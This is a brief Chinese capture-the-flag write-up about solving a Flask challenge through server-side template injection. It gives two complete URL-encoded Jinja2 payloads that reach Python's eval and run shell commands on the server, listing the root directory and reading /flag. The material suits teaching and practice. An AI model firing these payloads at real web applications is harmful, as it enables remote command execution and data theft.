看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞:
于是大概可以推测,题目应该考察的是模板注入漏洞。
打开题目网址,有个登录页面,输入用户名,进入下面的页面:
输入用户名:
看到地址接收name参数,尝试注入:
确定存在模板注入漏洞,于是构造payload:
http://eci-2ze3domag0jpuqjxvyct.cloudeci1.ichunqiu.com:8888/loged?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__class__%20%}%20{%%20if%20%27eval%27%20in%20b.keys()%20%}%20{{%20b[%27eval%27](%27__import__(%22os%22).popen(%22ls%20/%22).read()%27)%20}}%20%20{%%20endif%20%}%20{%%20endif%20%}%20{%%20endfor%20%}%20{%%20endif%20%}%20{%%20endfor%20%}
列出了根目录下的所有目录和文件,发现flag文件,于是继续构造payload:
http://eci-2ze3domag0jpuqjxvyct.cloudeci1.ichunqiu.com:8888/loged?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__class__%20%}%20{%%20if%20%27eval%27%20in%20b.keys()%20%}%20{{%20b[%27eval%27](%27__import__(%22os%22).popen(%22cat%20/flag%22).read()%27)%20}}%20%20{%%20endif%20%}%20{%%20endif%20%}%20{%%20endfor%20%}%20{%%20endif%20%}%20{%%20endfor%20%}
